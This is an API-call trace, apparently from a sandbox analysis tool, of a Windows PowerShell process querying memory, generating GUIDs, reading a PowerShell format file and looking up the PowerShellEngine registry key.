	[0146.212] VirtualQuery (in: lpAddress=0x1cb840, lpBuffer=0x1cc700, dwLength=0x30 | out: lpBuffer=0x1cc700*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.212] VirtualQuery (in: lpAddress=0x1cb8d0, lpBuffer=0x1cc790, dwLength=0x30 | out: lpBuffer=0x1cc790*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.212] VirtualQuery (in: lpAddress=0x1cb840, lpBuffer=0x1cc700, dwLength=0x30 | out: lpBuffer=0x1cc700*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.213] VirtualQuery (in: lpAddress=0x1cb8d0, lpBuffer=0x1cc790, dwLength=0x30 | out: lpBuffer=0x1cc790*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.213] VirtualQuery (in: lpAddress=0x1cb840, lpBuffer=0x1cc700, dwLength=0x30 | out: lpBuffer=0x1cc700*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.213] VirtualQuery (in: lpAddress=0x1cb8d0, lpBuffer=0x1cc790, dwLength=0x30 | out: lpBuffer=0x1cc790*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.213] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.213] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.213] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.213] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.214] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.214] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.214] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.214] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x9976bd07, Data2=0x6af3, Data3=0x4fef, Data4=([0]=0xbd, [1]=0xfb, [2]=0x52, [3]=0x6f, [4]=0x13, [5]=0xb6, [6]=0xe7, [7]=0xad))) returned 0x0
	[0146.214] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.214] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.214] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.214] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.215] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.215] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.215] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.215] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.215] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.215] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.215] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.215] VirtualQuery (in: lpAddress=0x1cb500, lpBuffer=0x1cc3c0, dwLength=0x30 | out: lpBuffer=0x1cc3c0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.215] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.215] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.216] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.216] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.216] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x29a4b075, Data2=0x33f1, Data3=0x4e94, Data4=([0]=0x8f, [1]=0xdb, [2]=0x60, [3]=0x70, [4]=0x90, [5]=0xf3, [6]=0x11, [7]=0x46))) returned 0x0
	[0146.216] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xedae1a2a, Data2=0x557, Data3=0x4b25, Data4=([0]=0x9f, [1]=0x84, [2]=0x72, [3]=0xf, [4]=0xf7, [5]=0x9e, [6]=0x9f, [7]=0x81))) returned 0x0
	[0146.216] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x9d55c729, Data2=0x6f7, Data3=0x41f3, Data4=([0]=0xaf, [1]=0x79, [2]=0x61, [3]=0xae, [4]=0x77, [5]=0xec, [6]=0x5b, [7]=0xd6))) returned 0x0
	[0146.217] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xdae12164, Data2=0x59f1, Data3=0x48bb, Data4=([0]=0xa7, [1]=0xe5, [2]=0xc4, [3]=0xbc, [4]=0xbb, [5]=0x7b, [6]=0x6, [7]=0xfc))) returned 0x0
	[0146.217] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xdc3c0d82, Data2=0x26fb, Data3=0x4ca9, Data4=([0]=0x80, [1]=0x79, [2]=0x74, [3]=0xdd, [4]=0xbe, [5]=0x97, [6]=0x4f, [7]=0x83))) returned 0x0
	[0146.217] VirtualQuery (in: lpAddress=0x1cb610, lpBuffer=0x1cc4d0, dwLength=0x30 | out: lpBuffer=0x1cc4d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.217] VirtualQuery (in: lpAddress=0x1cb6a0, lpBuffer=0x1cc560, dwLength=0x30 | out: lpBuffer=0x1cc560*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.217] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x7820d5ff, Data2=0x125c, Data3=0x4cf3, Data4=([0]=0xba, [1]=0xc8, [2]=0xfa, [3]=0x7, [4]=0x26, [5]=0x54, [6]=0x50, [7]=0xaa))) returned 0x0
	[0146.218] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xde9c8d54, Data2=0x2f3c, Data3=0x44c8, Data4=([0]=0xa0, [1]=0x3f, [2]=0x2f, [3]=0xcd, [4]=0xf6, [5]=0x73, [6]=0x89, [7]=0x9c))) returned 0x0
	[0146.218] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x2f33ad49, Data2=0x92eb, Data3=0x4652, Data4=([0]=0x81, [1]=0xe6, [2]=0xae, [3]=0x2, [4]=0xf3, [5]=0x83, [6]=0xb, [7]=0xc1))) returned 0x0
	[0146.218] SetErrorMode (uMode=0x1) returned 0x1
	[0146.218] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0146.218] SetErrorMode (uMode=0x1) returned 0x1
	[0146.218] GetFileType (hFile=0x320) returned 0x1
	[0146.218] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.219] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.219] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.286] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.286] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.286] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.286] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.286] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.286] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.287] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.287] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.288] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.288] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.288] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.288] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.289] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.289] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.290] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.290] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.291] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.291] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.291] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0xe67, lpOverlapped=0x0) returned 1
	[0146.291] ReadFile (in: hFile=0x320, lpBuffer=0x30aeb2f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30aeb2f*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0146.291] ReadFile (in: hFile=0x320, lpBuffer=0x30af560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x30af560*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0146.292] SetErrorMode (uMode=0x1) returned 0x1
	[0146.292] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccda0 | out: lpFileInformation=0x1ccda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0146.292] SetErrorMode (uMode=0x1) returned 0x1
	[0146.292] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cce88 | out: phkResult=0x1cce88*=0x320) returned 0x0
	[0146.292] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce0c, lpData=0x0, lpcbData=0x1cce08*=0x0 | out: lpType=0x1cce0c*=0x1, lpData=0x0, lpcbData=0x1cce08*=0x56) returned 0x0
	[0146.292] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c0c10
	[0146.292] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccddc, lpData=0x1b7c0c10, lpcbData=0x1ccdd8*=0x56 | out: lpType=0x1ccddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccdd8*=0x56) returned 0x0
	[0146.292] CoTaskMemFree (pv=0x1b7c0c10) 
	[0146.293] RegCloseKey (hKey=0x320) returned 0x0
	[0146.294] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xf76b4539, Data2=0x9c90, Data3=0x45fe, Data4=([0]=0xb7, [1]=0x3c, [2]=0xd7, [3]=0xec, [4]=0xe7, [5]=0x90, [6]=0x7e, [7]=0x4b))) returned 0x0
	[0146.295] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xbec410b5, Data2=0x31cb, Data3=0x436f, Data4=([0]=0xb8, [1]=0xfb, [2]=0x53, [3]=0xb8, [4]=0x99, [5]=0x34, [6]=0x86, [7]=0xa3))) returned 0x0
	[0146.296] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x4d450fa8, Data2=0x2ae0, Data3=0x4ec7, Data4=([0]=0xa9, [1]=0xb5, [2]=0x20, [3]=0x1d, [4]=0x9, [5]=0x69, [6]=0xc1, [7]=0x2))) returned 0x0
	[0146.296] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xad257998, Data2=0xdae7, Data3=0x406e, Data4=([0]=0xbb, [1]=0x12, [2]=0xab, [3]=0xa7, [4]=0xf7, [5]=0xd8, [6]=0xb3, [7]=0xcb))) returned 0x0
	[0146.297] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xafc05cfe, Data2=0xaea4, Data3=0x44f1, Data4=([0]=0x93, [1]=0xe3, [2]=0xd3, [3]=0x3c, [4]=0xd0, [5]=0x75, [6]=0xf4, [7]=0xd8))) returned 0x0
	[0146.298] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x8e0c8820, Data2=0xfec2, Data3=0x40ef, Data4=([0]=0xa9, [1]=0x96, [2]=0x39, [3]=0xdb, [4]=0x90, [5]=0x77, [6]=0x22, [7]=0x61))) returned 0x0
	[0146.298] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xdbec05d2, Data2=0xaec3, Data3=0x40ba, Data4=([0]=0x86, [1]=0x24, [2]=0xf4, [3]=0xd6, [4]=0x5, [5]=0x1d, [6]=0x2e, [7]=0xca))) returned 0x0
	[0146.299] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.301] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xe695f2e6, Data2=0x5e00, Data3=0x40a9, Data4=([0]=0xb6, [1]=0x7a, [2]=0xb, [3]=0x6d, [4]=0x7a, [5]=0x65, [6]=0x6b, [7]=0xb4))) returned 0x0
	[0146.301] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xa256b2c2, Data2=0xdf01, Data3=0x41cf, Data4=([0]=0xaf, [1]=0x3f, [2]=0xf6, [3]=0x5f, [4]=0xa2, [5]=0xb0, [6]=0xf9, [7]=0x39))) returned 0x0
	[0146.302] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xccf35654, Data2=0x5a15, Data3=0x43bd, Data4=([0]=0xa5, [1]=0xba, [2]=0x69, [3]=0xf, [4]=0x73, [5]=0x6a, [6]=0x46, [7]=0xf))) returned 0x0
	[0146.302] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xcf35b149, Data2=0x5e46, Data3=0x40cd, Data4=([0]=0x95, [1]=0x87, [2]=0xe9, [3]=0xe0, [4]=0x37, [5]=0x5b, [6]=0x2f, [7]=0xc8))) returned 0x0
	[0146.303] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xb3ce7c21, Data2=0xb417, Data3=0x489a, Data4=([0]=0xa1, [1]=0xf8, [2]=0x96, [3]=0xbf, [4]=0xb, [5]=0x66, [6]=0x8e, [7]=0xeb))) returned 0x0
	[0146.303] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x28411b51, Data2=0x91d4, Data3=0x401b, Data4=([0]=0x89, [1]=0xad, [2]=0xcf, [3]=0xd8, [4]=0xf5, [5]=0x1d, [6]=0x28, [7]=0xa8))) returned 0x0
	[0146.304] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x7e972, Data2=0xa4a3, Data3=0x40a8, Data4=([0]=0x88, [1]=0x1, [2]=0x3a, [3]=0x67, [4]=0x5f, [5]=0x26, [6]=0xf6, [7]=0x4c))) returned 0x0
	[0146.304] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x314f0828, Data2=0x8258, Data3=0x4a33, Data4=([0]=0x88, [1]=0x78, [2]=0x28, [3]=0x7e, [4]=0x4c, [5]=0x68, [6]=0xe6, [7]=0xb8))) returned 0x0
	[0146.304] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xbc6c650b, Data2=0x506c, Data3=0x407e, Data4=([0]=0xb5, [1]=0x36, [2]=0x68, [3]=0x6c, [4]=0xfd, [5]=0x49, [6]=0xb3, [7]=0x19))) returned 0x0
	[0146.304] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xa04da488, Data2=0x7e08, Data3=0x4aee, Data4=([0]=0xad, [1]=0xd3, [2]=0xee, [3]=0xfd, [4]=0xde, [5]=0x63, [6]=0x9a, [7]=0x2c))) returned 0x0
	[0146.304] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x27b5fe6a, Data2=0x64ed, Data3=0x4af9, Data4=([0]=0x95, [1]=0xad, [2]=0xe7, [3]=0xd9, [4]=0x7d, [5]=0xd6, [6]=0xb0, [7]=0x2c))) returned 0x0
	[0146.305] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xec98a658, Data2=0xd7ee, Data3=0x48c4, Data4=([0]=0xb2, [1]=0x16, [2]=0xaf, [3]=0xdb, [4]=0x29, [5]=0x48, [6]=0x80, [7]=0x64))) returned 0x0
